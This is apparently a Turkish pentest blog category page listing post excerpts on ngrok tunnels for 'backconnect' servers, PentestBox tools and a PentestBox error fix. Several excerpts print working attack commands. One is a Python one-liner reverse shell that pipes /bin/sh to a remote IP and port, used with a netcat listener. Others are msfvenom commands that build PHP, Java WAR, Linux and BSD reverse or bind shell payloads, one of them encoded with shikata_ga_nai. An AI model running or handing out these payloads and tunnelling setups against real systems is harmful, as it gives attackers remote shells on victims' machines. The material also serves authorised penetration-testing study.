İçeriğe geç

Kategori: pentest

Backconnect Server With Ngrok

Daha önce ki Ngrok yazımda ngrok işlevi hakkında detaylı bilgi vermiştim. O yüzden kurulum kullanım kısmını atlıyorum ve direk konuya dalıyorum.   Ngrok Download linkinden edinebilirsiniz. Netcat Download linkinden indirebilirsiniz. Ngrok kurulum ve token işlerini bitirdikten sonra uzak bağlantıya hazırlayalım. 8081 portunda tcp bağlantı başlatıyoruz. ./ngrok.exe tcp 8081 Daha sonra ngrok bize…

Reverse Shell Python Code

Daha önce msfvenom üzerinden bağlantı sağlama ile ilgili bir paylaşımda bulunmuştum. Uzak bağlantı için python aracılığıyla bağlantı sağlayabilmek için aşağıdaki kod parçası işimizi görecektir. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip-adress",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' burada belirtilen  ip-adress ve port parametrelerini kendinize göre düzenleyerek kodu çalıştırmanız yeterli olacaktır. Önce netcat vasıtasıyla nc -lvp port şeklinde…

Ngrok Nedir? Yerel Sunucularınızı Güvenli Tüneller ile yapın

Ngrok ile benim gibi modemle başı belada olup port açma sorunu yarayan herkesin tanışması gerekiyor. Kendisi sayesinde ister localhost unuzu paylaşın isterseniz dilediğiniz yerden erişim sağlayın. Herhangi bir sunucuya ihtiyaç duymadan çalıştığınız projeyi localhostunuz üzerinden rahatlıkla paylaşabilirsiniz. Üstelik güvenli. Ngrok güvenliği nedir Ngrok nedir? Ngrok nasıl kullanılır? ngrok port açma…

msfvenom payload

PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b “\x00\x0a\x0d\x20” -e x86/shikata_ga_nai Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o…

Pentestbox

PENTESTBOX Windows ortamında pentest işlemleri yapanlar için bulunmaz nimet. Herhangi bir linux dağıtımını kurmaya gerek kalmadan hemen hemen tüm pentest toolarını ve modüllerini içeren bir pakettir. İndirmek için tıklayınız Pentestbox içerisinde bulunan toolların tamamı Burp Suite http://portswigger.net/burp/ Commix https://github.com/stasinopoulos/commix dotdotpwn https://github.com/PentestBox/dotdotpwn fimap https://tha-imax.de/git/root/fimap/tree/master Golismero https://github.com/golismero/golismero jSQL https://github.com/ron190/jsql-injection Nikto https://github.com/sullo/nikto PadBuster…

PentestBox Çalışma Hatası pentest box ‘sqlmap’ is not recognized as an internal or external command, operable program or batch file.

PentestBox üzerinde ilk kurulum sonrası bazı sistemlerde örneğin sqlmap uygulamasını çalıştırmayı denediniz aşağıdaki gibi bir hata alabilirsiniz. Bunun çözümü çok basit. pentest box ‘atom’ is not recognized as an internal or external command, operable program or batch file. pentest box ‘atom’ is not recognized as an internal or external command,…

Windows Ortamında Linux Araçlarının Kullanımı – PentestBox Tools

Sistemler üzerinde güvenlik açığı testi yapan hemen hemen bir çok kullanıcı Windows İşletim sisteminde sanal makineler üzerine Linux İşletim sistemi kurularak Linux’ un sunmuş olduğu imkanlardan faydalanır. Windows üzerinde Sanal Makine ile çalışırken bilgisayarımızda aşırı şekilde Bellek ve Cpu kullanımına neden olmaktadır. Bu gün sizlere Windows üzerinde Portable olarak çalışan ve Linux’ ta kullandığınız modüllerin hemen hemen hepsine sahip olan, kolay kullanımı…